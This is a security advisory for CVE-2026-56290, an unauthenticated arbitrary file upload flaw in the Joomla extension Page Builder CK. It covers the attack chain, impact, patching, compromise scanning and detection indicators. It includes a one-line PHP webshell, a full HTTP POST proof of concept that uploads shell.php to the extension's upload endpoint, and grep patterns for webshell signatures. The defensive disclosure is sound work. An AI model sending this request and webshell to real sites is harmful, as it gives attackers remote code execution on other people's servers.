Executive Summary
A maximum-severity unauthenticated arbitrary file upload vulnerability (CVE-2026-56290) has been discovered in the Page Builder CK extension for Joomla, developed by Joomlack (joomlack.fr). The flaw carries a CVSS v4.0 score of 10.0 and allows any unauthenticated remote attacker to upload an executable PHP file — such as a webshell — to the server, enabling complete remote code execution and full server takeover.
CVSS v4.0 Score: 10.0 (Critical) — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:A/AU:Y/U:Red
CVSS v3.1 Score: 9.8 (Critical) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
On July 7, 2026, CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and set a federal agency remediation deadline of July 10, 2026 — one of the shortest deadlines possible — confirming active exploitation in the wild. All Joomla sites running Page Builder CK should treat this as an emergency and patch immediately.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-56290 |
| CWE | CWE-434 (Unrestricted Upload of File with Dangerous Type) |
| CVSS v4.0 Score | 10.0 (Critical) |
| CVSS v3.1 Score | 9.8 (Critical) |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Exploitation Status | Actively exploited in the wild (E:A) |
| CISA KEV | Yes — added July 7, 2026 |
| Federal Remediation Deadline | July 10, 2026 (BOD 22-01) |
Affected Versions
| Extension | Affected Versions | Status |
|---|---|---|
| Joomlack Page Builder CK | 1.0 through 3.6.0 | Patch available from vendor |
Technical Details
The vulnerability is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). The Page Builder CK extension exposes an upload endpoint that:
- Does not authenticate upload requests — no session token, API key, or credential check
- Does not validate or restrict file types —
.php,.phtml,.php5, and other executable extensions are accepted - Does not sanitize uploaded filenames — files land in a web-accessible directory with their original names intact
An attacker can exploit this by sending a crafted HTTP POST request directly to the upload endpoint with a PHP webshell payload. Once uploaded, the attacker accesses the file via a browser request to execute arbitrary PHP code in the context of the web server user.
Attack Chain
1. Attacker identifies Joomla site with Page Builder CK installed (any version 1.0–3.6.0)
2. Attacker crafts a malicious HTTP POST to the extension's upload endpoint
3. No authentication check — server accepts the request
4. PHP webshell (e.g., <?php system($_GET['cmd']); ?>) written to web-accessible path
5. Attacker navigates to uploaded file URL
6. Attacker executes arbitrary commands as the web server user
7. Full server compromise: database access, file system control, lateral movementMinimal Proof-of-Concept (Conceptual)
POST /index.php?option=com_pagebuilderck&task=upload HTTP/1.1
Host: target.example.com
Content-Type: multipart/form-data; boundary=--boundary
----boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
<?php system($_GET['c']); ?>
----boundary--Impact
| Impact Area | Description |
|---|---|
| Remote Code Execution | Execute arbitrary PHP/OS commands via uploaded webshell |
| Full Server Takeover | Web server user context; escalation possible depending on host config |
| Database Compromise | Read Joomla configuration.php for DB credentials; full data access |
| Persistent Backdoor | Uploaded files survive Joomla updates; require manual removal |
| Data Exfiltration | All site content, user PII, credentials accessible |
| Lateral Movement | Pivot to other sites on shared hosting; internal network reconnaissance |
| Malware Distribution | Serve drive-by malware or phishing content to site visitors |
The E:A (Exploitation Active) modifier in the CVSS v4.0 vector and the 3-day federal remediation window confirm that this vulnerability is being weaponized at scale right now.
Remediation
Step 1: Apply the Vendor Patch Immediately
A security patch is available from the Joomlack vendor forum at joomlack.fr. Update Page Builder CK to the patched release as soon as possible.
# Via Joomla Extensions Manager (admin panel):
# Extensions > Manage > Update
# Or manually download the patched package from joomlack.fr and install via Upload Package FileStep 2: Scan for Existing Compromise
The active exploitation status means your site may already be compromised if you were running an affected version. Scan immediately:
# Find recently created/modified PHP files in web-accessible directories
find /path/to/joomla/ -name "*.php" -newer /path/to/joomla/configuration.php -type f | grep -v cache
# Check for common webshell signatures in Page Builder CK directories
grep -rl "system\s*(\$_" /path/to/joomla/components/com_pagebuilderck/
grep -rl "eval\s*(base64_decode" /path/to/joomla/
# Check for POST requests to the upload endpoint in access logs
grep -i "pagebuilderck.*upload\|upload.*pagebuilderck" /var/log/apache2/access.log
grep -i "pagebuilderck.*upload\|upload.*pagebuilderck" /var/log/nginx/access.logStep 3: If Immediate Patching Is Not Possible
- Disable the Page Builder CK extension immediately via Joomla Extensions Manager
- Block access to the upload endpoint at the web server or WAF level:
location ~* /index\.php.*pagebuilderck.*upload { deny all; return 403; } - Set upload directories to non-executable if extension must remain active temporarily
- Monitor access logs continuously for POST requests to Page Builder CK endpoints
Detection Indicators
| Indicator | Description |
|---|---|
| POST requests to Page Builder CK upload endpoints | Direct exploitation attempts |
New .php files in Joomla component directories | Uploaded webshells |
HTTP access to unexpected .php files in media/upload paths | Attacker triggering webshell |
| Outbound connections from web server to unknown hosts | Post-exploitation C2 or data exfiltration |
| Unusual database queries or admin account creation | Post-compromise persistence activity |
CISA KEV Context
CISA's Known Exploited Vulnerabilities catalog addition represents the U.S. government's highest-urgency public disclosure for active threats. Under Binding Operational Directive 22-01, all U.S. federal civilian agencies must remediate KEV-listed vulnerabilities by the specified deadline — in this case, July 10, 2026. While the directive applies to federal agencies, CISA strongly urges private sector organizations to treat KEV entries with equivalent urgency given the confirmed active exploitation.